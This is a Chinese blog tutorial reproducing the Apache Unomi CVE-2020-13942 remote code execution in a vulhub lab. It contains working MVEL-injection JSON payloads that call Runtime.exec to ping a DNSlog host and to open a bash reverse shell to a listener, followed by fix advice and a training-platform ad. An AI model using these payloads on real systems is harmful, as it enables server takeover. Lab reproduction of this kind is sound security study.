0x00简介
Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。
Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:
Ø Web CMS 个性化服务
Ø 原生移动应用的分析服务
Ø 具有分段功能的集中配置文件管理系统
Ø 授权管理中心
0x01漏洞概述
在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。
0x02影响版本
Apache Unomi < 1.5.2
0x03环境搭建
1、本次环境搭建使用vulhub中的docker环境搭建,下载地址
https://github.com/vulhub/vulhub
2、然后使用vulhub中unomi目录下CVE-2020-13942漏洞为本次漏洞复现环境
cd vulhub/unomi/CVE-2020-13942/
3、使用以下命令启动漏洞环境
docker-compose up -d
4、看到下方显示绿色字体的done表明启动成功,在浏览器访问http://your-ip:8181出现以下界面表示成功
0x04漏洞复现
1、 打开靶场首页,使用burp进行抓包,发送到Repeater模块构造数据包
2、将GET包改为POST,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据,在dnslog添加成自己的地址,然后发送
{
"filters": [
{
"id": "boom",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec('ping DNSlog');"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "boom"
}
3、在dnslog网站上刷新查看是否有数据,可以看到有数据
4、利用此漏洞反弹shell,将bash反弹shell的命令进行编码,编码网址为:http://www.jackson-t.ca/runtime-exec-payloads.html
5、将编码后的shell添加到以下代码中的shell编码处,kali设置监听,然后发送。
{
"filters": [
{
"id": "boom",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"shell编码\");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "boom"
}
6、在kali上查看shell成功返回。
0x05修复建议
1、尽可能避免将用户数据放入表达式解释器中。
2、目前厂商已发布最新版本,请受影响用户及时下载并更新至最新版本。官方链接如下:https://unomi.apache.org/download.html
在这里,给大家介绍一下“东塔攻防世界靶场”
2020年12月,东塔攻防世界靶场正式对外提供注册,各位小伙伴可通过注册后进行体验。新注册用户可获得一定的积分,对于靶场使用获取正确的Key后,也可以获取一定的经验值,经验值根据排名会不定期给予一定的奖励。
并且,在操作过程中,针对出现的Bug和安全漏洞问题可以和塔塔子提出,审核通过后可以获得相应的奖励积分。
东塔攻防世界网站不定时推出可免费限时使用的靶场,具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服了解详情。
东塔攻防世界靶场主要分为在线靶场和职业体系两大特色板块。且平台内的靶场会定期更新内容,尤其是最新漏洞复现的一些文章和靶场,会优先在靶场中提供环境让大家体验。
东塔攻防世界网站会不定期限时免费推出最新的一些复现的靶场,以供学习交流,给了大家充分体验和使用靶场的机会。
具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服wx(dongtakefu)了解详情。
除了以上介绍的内容,还有更多宝藏区域,更强大的功能,等你来寻宝!
详戳下方“东塔攻防世界靶场”网址,Get一波新世界
https://labs.do-ta.com
转载:https://blog.csdn.net/m0_48520508/article/details/114673163